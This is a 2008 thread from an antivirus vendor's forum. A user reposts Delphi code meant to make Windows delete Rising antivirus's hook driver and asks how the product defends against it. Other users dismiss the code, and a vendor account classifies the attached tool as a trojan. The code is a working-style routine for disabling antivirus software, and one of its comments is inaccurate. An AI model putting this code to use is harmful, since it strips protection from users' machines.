wjzdw - 2008-8-8 17:56:00
据说可以kill RISING
版主给看看 瑞星是否能够如何防范
关键代码:
function Deleterising:boolean;
var
Wdir : pChar;
Stmp,RisHookPath:string;
Hfile:THandle;
begin
result:=false;
Getmem(wdir,255);
GetSystemDirectory(Wdir, 255); //得到系统System32的目录
Stmp:=pchar(wdir);
if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\';
RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径
//showmessage(RisHookPath);
Try
Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件
closehandle(hfile);
result:=true;
except
end;
end;procedure TForm1.FormCreate(Sender: TObject);
begin
if Deleterising then
begin
showmessage('删除文件成功,请重启系统!');end;end;
end.【转自黑防】
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; TheWorld)附件:
kill rising.rar
baohe - 2008-8-8 22:54:00
过不了我的Tiny,就别想删除瑞星。打开HOOKHELP.SYS,成功没成功都判断不了,就号称删除瑞星了?汗!
附件:
您所在的用户组无法下载或查看附件重启就重启!谁怕谁呀?!切!
附件:
您所在的用户组无法下载或查看附件
RisingCSC - 2008-8-13 14:19:00
文件名:kill rising.exe
病毒名:Trojan.Win32.KillAV.abu
您所上报的病毒文件将在瑞星2008的20.57.20版本中处理解决,如遇特殊情况可能会推后几个版本。
© 2000 - 2025 Rising Corp. Ltd.